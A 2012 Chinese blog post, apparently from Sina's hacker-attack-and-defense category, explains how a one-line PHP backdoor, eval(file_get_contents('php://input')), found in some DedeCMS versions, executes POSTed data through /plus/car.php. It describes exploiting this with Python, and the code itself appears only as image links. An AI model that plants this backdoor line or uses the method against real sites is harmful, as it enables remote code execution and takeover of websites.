加载中…
个人资料
  • 博客等级:
  • 博客积分:
  • 博客访问:
  • 关注人气:
  • 获赠金笔:0支
  • 赠出金笔:0支
  • 荣誉徽章:
正文 字体大小:

python利用一句户木马

(2012-09-04 08:26:45)
标签:

python利用一句户木马

eval(file_get_conten

杂谈

分类: 黑客攻防

python利用一句户木马eval_r(file_get_contents('php://input'));

    分析原因:DedeCMS某些版本/include/shopcar.class.php文件中存在eval_r(file_get_contents('php://input'));这样一句话,shopcar.class.php只是一个class类,在/plus/car.php文件实例化了这个类,并调用了这个类,所以一当访问car.php这个文件并用POST给他提交数据时,他就会执行shopcar.class.php类中的eval_r(file_get_contents('php://input'));这句话,结果就是:php://input(抓取POST提交的数据流)把提交给car.php的数据提取出来并以文件的形式保存,file_get_contents()函数就读出刚才保存的数据,再用eval_r()执行之。

    所以综上所述的分析:我们可以想到:只要在你的网站下有/plus/car.php文件,并在这个文件中存在一句户木马eval_r(file_get_contents('php://input'));的话,一样就存在上述漏洞,而且就可以利用这个一句户木马漏洞了,哈哈,下面看看真枪实战了,思密达。

    通过下面的例子,我又一次感觉到python的强大啦!!!!!

    在刚开始没想到用python来实现,写了个php网页在利用这个一句话木马,但是post提交的数据被urlencode了,很是郁闷,提交的命令什么的都被编码了。无法被强大而邪恶的eval执行了,后来想到换一种语言,就用了python,一次搞定,屡试不爽啊!!!

请看下面的代码:
http://s1/middle/714c124ftc8d55762ae90&690
在你的网站根目录下防止上面分析的文件,如下:
http://s4/middle/714c124ftc8d577cf8f23&690


0

阅读 收藏 喜欢 打印举报/Report
  

新浪BLOG意见反馈留言板 欢迎批评指正

新浪简介 | About Sina | 广告服务 | 联系我们 | 招聘信息 | 网站律师 | SINA English | 产品答疑

新浪公司 版权所有